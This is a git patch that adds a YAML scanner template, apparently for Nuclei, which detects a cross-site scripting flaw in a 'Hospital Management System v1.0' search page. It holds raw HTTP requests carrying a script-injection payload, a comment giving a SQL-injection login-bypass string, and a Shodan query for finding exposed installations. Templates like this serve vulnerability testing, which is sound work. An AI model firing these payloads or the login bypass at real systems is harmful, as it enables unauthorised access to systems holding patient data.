From 1b9b7e3ac04a6d7527874ade3f750e637afba2dc Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Wed, 14 Sep 2022 18:31:55 +0530 Subject: [PATCH] Create hms-xss.yaml --- vulnerabilities/other/hms-xss.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 vulnerabilities/other/hms-xss.yaml diff --git a/vulnerabilities/other/hms-xss.yaml b/vulnerabilities/other/hms-xss.yaml new file mode 100644 index 0000000000..26ac2dc9cc --- /dev/null +++ b/vulnerabilities/other/hms-xss.yaml @@ -0,0 +1,44 @@ +id: hms-xss + +info: + name: Hospital Management System v1.0 - Cross Site Scripting + author: arafatansari + severity: medium + description: | + Hospital Management System v1.0 was discovered to contain a XSS vulnerability via the searchdata parameter in patient-search.php. + metadata: + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Hospital Management System" + verified: true + tags: hms,hospital,cms,xss + +requests: + - raw: + - | + POST /hms/doctor/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}password={{password}}&submit= + + - | + POST /hms/doctor/search.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + searchdata=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&search= + + skip-variables-check: true + redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: status + status: + - 200